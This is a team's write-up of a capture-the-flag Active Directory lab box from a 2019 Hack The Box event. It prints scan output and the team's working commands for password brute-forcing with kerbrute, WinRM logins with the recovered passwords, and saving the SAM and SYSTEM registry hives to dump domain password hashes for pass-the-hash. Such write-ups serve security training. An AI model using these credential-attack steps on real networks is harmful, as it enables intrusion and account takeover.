Initial disclaimer

I didn’t spend a lot of time preparing this writeup, I’m absolutely burnt out from hammering away at this CTF. It lasted roughly 4 hours long and we still maintained first for the whole time (yay!) and it was absolutely exhausting. Well done to the HackTheBox team for putting this together. Anyways, here it is!

Hack The Box B-Sides Fredericton 11/16/2019 Writeup
Team: OwO
Place: First
Box name: FSMO
Connection Flag: flag{helloworld}
1. flag{Ld4P_an0nyMous_b1nds}
2. flag{DoNt_D1sable_k3rBer0s_pr3-auth3ntic4tion} 
3. flag{cR3dent1@ls_so_expo5ed}
4. X

Initial nmap scan:

$nmap -sS -p- 10.10.10
88/tcp    open  kerberos-sec Microsoft Windows Kerberos (server time: 2019-11-16 17:06:00Z)
135/tcp   open  msrpc        Microsoft Windows RPC
139/tcp   open  netbios-ssn  Microsoft Windows netbios-ssn
389/tcp   open  ldap         Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL, Site: Default-First-Site-N
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
636/tcp   open  tcpwrapped
3268/tcp  open  ldap         Microsoft Windows Active Directory LDAP (Domain: MEGACORP.LOCAL, Site: Default-First-Site-N
3269/tcp  open  tcpwrapped
5985/tcp  open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)It lasted roughly 4 hours long 
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
9389/tcp  open  mc-nmf       .NET Message Framing
47001/tcp open  http         Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc        Microsoft Windows RPC
49665/tcp open  msrpc        Microsoft Windows RPC
49666/tcp open  msrpc        Microsoft Windows RPC
49667/tcp open  msrpc        Microsoft Windows RPC
49671/tcp open  msrpc        Microsoft Windows RPC
49674/tcp open  ncacn_http   Microsoft Windows RPC over HTTP 1.0
49675/tcp open  msrpc        Microsoft Windows RPC
49677/tcp open  msrpc        Microsoft Windows RPC
49680/tcp open  msrpc        Microsoft Windows RPC
49696/tcp open  msrpc        Microsoft Windows RPC

Initial scans reveal a number of active directory related services running. We can gather a handful of information from the scan, such as the Device/AD Name (megacorp.local), Windows RM (take note of that, it will come into play later), SMB, and Kerberos.

Next, we would normally check for low hanging fruit – SMB is first up. Running Enum4linux on the target machine reveals a lot of information to us, including the first flag:

|    Target Information    | 
Target ........... 
RID Range ........ 500-550,1000-1050 
Username ......... '' 
Password ......... '' 
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none 

|    Session Check on    | 
[+] Server allows sessions using username '', password '' 
[+] Got domain/workgroup name:  
|    Getting domain SID for    | 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./ line 359. 
Domain Name: MEGACORP 
Domain Sid: S-1-5-21-3167813660-1240564177-918740779 
[+] Host is part of a domain (not a workgroup) 
|    OS information on    | 

[+] Got OS info for from smbclient:  
[+] Got OS info for from srvinfo: 

|    Users on    | 
index: 0xfbc RID: 0x1f4 acb: 0x00000210 Account: Administrator  Name: (null)    Desc: Built-in account for administering the computer/domain 
index: 0xfbe RID: 0x1f7 acb: 0x00000215 Account: DefaultAccount Name: (null)    Desc: A user account managed by the system. 
index: 0x1095 RID: 0x44f acb: 0x00000210 Account: dev-batch     Name: dev-batch Desc: (null) 
index: 0x10a8 RID: 0x641 acb: 0x00000210 Account: flag{Ld4P_an0nyMous_  Name: flag{Ld4P_an0nyMous_b1nds}        Desc: (null) 
index: 0xfbd RID: 0x1f5 acb: 0x00000215 Account: Guest  Name: (null)    Desc: Built-in account for guest access to the computer/domain 
index: 0xff4 RID: 0x1f6 acb: 0x00000011 Account: krbtgt Name: (null)    Desc: Key Distribution Center Service Account 
index: 0x10a7 RID: 0x458 acb: 0x00000210 Account: lara  Name: Lara Stein        Desc: (null) 
index: 0x10a5 RID: 0x456 acb: 0x00000210 Account: magnus        Name: Magnus Bilde      Desc: (null) 
index: 0x10a6 RID: 0x457 acb: 0x00000210 Account: matt  Name: Matt Hale Desc: (null) 
index: 0x1097 RID: 0x450 acb: 0x00000210 Account: sonny Name: sonny     Desc: (null) 
index: 0x10a4 RID: 0x455 acb: 0x00010210 Account: svc-netapp    Name: svc-netapp        Desc: (null) 
user:[Administrator] rid:[0x1f4] 
user:[Guest] rid:[0x1f5] 
user:[krbtgt] rid:[0x1f6] 
user:[DefaultAccount] rid:[0x1f7] 
user:[dev-batch] rid:[0x44f] 
user:[sonny] rid:[0x450] 
user:[svc-netapp] rid:[0x455] 
user:[magnus] rid:[0x456] 
user:[matt] rid:[0x457] 
user:[lara] rid:[0x458] 
user:[flag{Ld4P_an0nyMous_] rid:[0x641] 
|    Share Enumeration on    | 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./ line 640. 
smb1cli_req_writev_submit: called for dialect[SMB3_11] server[] 
do_connect: Connection to failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND) 
        Sharename       Type      Comment 
        ---------       ----      ------- 
Error returning browse list: NT_STATUS_REVISION_MISMATCH 
Reconnecting with SMB1 for workgroup listing. 
Failed to connect with SMB1 -- no workgroup available 
[+] Attempting to map shares on 
|    Password Policy Information for    | 
[+] Attaching to using a NULL share 
[+] Trying protocol 445/SMB... 
[+] Found domain(s): 
        [+] MEGACORP 
        [+] Builtin 
[+] Password Info for Domain: MEGACORP 
        [+] Minimum password length: 7 
        [+] Password history length: 24 
        [+] Maximum password age: Not Set 
        [+] Password Complexity Flags: 000000 
                [+] Domain Refuse Password Change: 0 
                [+] Domain Password Store Cleartext: 0 
                [+] Domain Password Lockout Admins: 0 
                [+] Domain Password No Clear Change: 0 
                [+] Domain Password No Anon Change: 0 
                [+] Domain Password Complex: 0 
        [+] Minimum password age: 1 day 4 minutes  
        [+] Reset Account Lockout Counter: 30 minutes  
        [+] Locked Account Duration: 30 minutes  
        [+] Account Lockout Threshold: None 
        [+] Forced Log off Time: Not Set 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./ line 501. 
[+] Retieved partial password policy with rpcclient: 
Password Complexity: Disabled 
Minimum Password Length: 7 
|    Groups on    | 
Use of uninitialized value $global_workgroup in concatenation (.) or string at ./ line 542. 
[+] Getting builtin groups: 
group:[Account Operators] rid:[0x224] 
group:[Pre-Windows 2000 Compatible Access] rid:[0x22a] 
group:[Incoming Forest Trust Builders] rid:[0x22d] 
group:[Windows Authorization Access Group] rid:[0x230] 
group:[Terminal Server License Servers] rid:[0x231] 
group:[Administrators] rid:[0x220] 
group:[Users] rid:[0x221] 
group:[Guests] rid:[0x222] 
group:[Print Operators] rid:[0x226] 
group:[Backup Operators] rid:[0x227] 
group:[Replicator] rid:[0x228] 
group:[Remote Desktop Users] rid:[0x22b] 
group:[Network Configuration Operators] rid:[0x22c] 
group:[Performance Monitor Users] rid:[0x22e] 
group:[Performance Log Users] rid:[0x22f] 
group:[Distributed COM Users] rid:[0x232] 
group:[IIS_IUSRS] rid:[0x238] 
group:[Cryptographic Operators] rid:[0x239] 
group:[Event Log Readers] rid:[0x23d] 
group:[Certificate Service DCOM Access] rid:[0x23e] 
group:[RDS Remote Access Servers] rid:[0x23f] 
group:[RDS Endpoint Servers] rid:[0x240] 
group:[RDS Management Servers] rid:[0x241] 
group:[Hyper-V Administrators] rid:[0x242] 
group:[Access Control Assistance Operators] rid:[0x243] 
group:[Remote Management Users] rid:[0x244] 
group:[System Managed Accounts Group] rid:[0x245] 
group:[Storage Replica Administrators] rid:[0x246] 
group:[Server Operators] rid:[0x225]

The user account being the flag: flag{Ld4P_an0nyMous_b1nds}

Reviewing our Enum4Linux output, we can get a number of usernames revealed to us, as well as the password policy. The users we retrieved are:

cn: sonny
userPrincipalName: [email protected]
cn: svc-netapp
userPrincipalName: [email protected]
cn: Magnus Bilde
userPrincipalName: [email protected]
cn: Matt Hale
userPrincipalName: [email protected]
cn: Lara Stein
userPrincipalName: [email protected]
cn: flag{Ld4P_an0nyMous_b1nds}
userPrincipalName: flag{Ld4P_an0nyMous_b1nds}@MEGACORP.LOCAL

With the user accounts, we can attempt to do more enumeration, however, not much additional information is turned up.

We have to strange accounts that we can look at here, svc-netapp and the flag user account. Using a tool called “Kerbrute” we can brute force the users passwords

#./kerbrute_linux_amd64 bruteuser -d megacorp.local /usr/share/seclists/Passwords/darkweb2017-top10000.txt svc-netapp --dc
    __             __               __      
   / /_____  _____/ /_  _______  __/ /____  
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \ 
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/ 
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                         
Version: v1.0.2 (fd5f345) - 11/16/19 - Ronnie Flathers @ropnop 
2019/11/16 15:59:15 >  Using KDC(s): 
2019/11/16 15:59:15 > 
2019/11/16 15:59:15 >  [+] VALID LOGIN:  [email protected]:1234567890 
2019/11/16 15:59:16 >  Done! Tested 31 logins (1 successes) in 0.613 seconds

Imediately the password of the user account is revealed to us as “1234567890: However, it was possible using GetNPUsers within the Impacket suite to retrieve a Ticket for the svc-netapp user account.

Now, we can explore the system with either smbclient, or we can invoke a shell using Evil-WinRM To install Evil-WinRM you can do “gem install evil-winrm”

$evil-winrm -i -u svc-netapp
password: 01234567890
*Evil-WinRM* PS C:\Users\svc-netapp\Documents> cd ..\Desktop\
*Evil-WinRM* PS C:\Users\svc-netapp\Desktop> more flag.txt


After gaining access to a user account on the system we need to elevate privileges to a different user. To view all the users on the system we can issue the “net users” command

Administrator            DefaultAccount           dev-batch                 
flag{Ld4P_an0nyMous_     Guest                  krbtgt                    
lara                            magnus                   matt                      
sonny                    svc-netapp               
 and issuing a dir C:\Users\

Mode                LastWriteTime         Length Name                                                                                                                                                                                                    
----                -------------         ------ ----                                                                                                                                                                                                    
d-----        9/25/2019  10:57 AM                Administrator                                                                                                                                                                                           
d-----       11/16/2019   9:47 AM                dev-batch                                                                                                                                                                                               
d-r---       11/20/2016   5:24 PM                Public                                                                                                                                                                                                  
d-----       11/16/2019  12:10 PM                svc-netapp

Our options on who to pivot to are fairly limited, our best option is to see if we can find a user account password and or brute force “dev-batch”’s account login.

Exploring SMB, we can see a number of shares listed

smbclient -L // -U svc-netapp  
Enter WORKGROUP\svc-netapp's password:  01234567890
        Sharename       Type      Comment 
        ---------       ----      ------- 
        ADMIN$          Disk      Remote Admin 
        C$              Disk      Default share 
        Development     Disk       
        dfs             Disk       
        E$              Disk      Default share 
        IPC$            IPC       Remote IPC 
        NETLOGON        Disk      Logon server share  
        SYSVOL          Disk      Logon server share 

Scanning each share is incredibly time consuming, but with the 4 of us actively searching we quickly found drive.vbs located in the NETLOGON share. Reading out the file, we are left with “dev-batch”s user account password

Dim oNet 
Set oNet = WScript.CreateObject("WScript.Network") 
strDrive = "Q:" 
strShare = "\\megacorp.local\development" 
strPer = "FALSE" 
strUsr = "dev-batch" 
strPass = "cNh6uC2xgc7@x" 
oNet.MapNetworkDrive strDrive, strShare, strPer, strUsr, strPas

With our (hopefully) more privileged user account, we can now access their accounts Using Evil-WinRM we can collect another flag!

*Evil-WinRM* PS C:\Users\dev-batch\Documents> cd C:\Users\dev-batch\Desktop
*Evil-WinRM* PS C:\Users\dev-batch\Desktop> dir

    Directory: C:\Users\dev-batch\Desktop

Mode                LastWriteTime         Length Name                                                                                                                                                                                                    
----                -------------         ------ ----                                                                                                                                                                                                    
-ar---        9/25/2019   1:58 PM             28 flag.txt                                                                                                                                                                                                

*Evil-WinRM* PS C:\Users\dev-batch\Desktop> more flag.txt

And sure enough, we have another flag. We were unable to root the box within the 4 hour given time frame, however, we did find a number of interesting files. I’ll go over how we retrieved some of them:

We could obtain several key hives directly from the registry using

reg.exe save hklm\sam E:\sam.hive

reg.exe save hklm\system E:\system.hive

Lastly, we found one more aditional sensitive file (ntds.dit) within the C:\System32 folder, we could then pull the files down off the server using a wide variety of methods (personally, we used the open E$ Samba share due to simplicity), then we could dump the password hashes of the user accounts on the system using within the Impacket suite.

#./ -sam ./sam -system ./system -ntds ./ntds.dit local
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation

[*] Target system bootKey: 0xbf52866106a6efc249f28895d39f99d3
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Searching for pekList, be patient
[*] Reading and decrypting hashes from /root/Downloads/ntds.dit 
[*] Cleaning up... 

Having the admistrator hash, we could do a few things: attempt to preform a Pass-The-Hash attack and authenthicate as the administrator and lastly try to crack the hash itself. Unfortunately, none of these were the intended method, and it was something that we were way way way far off on (sadly), but hey, we still came in first and a win is a win! Note: It was possible to crack the hash, although brute forcing would have been necessary. At the end of the official writeup, the credentials were revealed to be:


You can view the full official writeup here: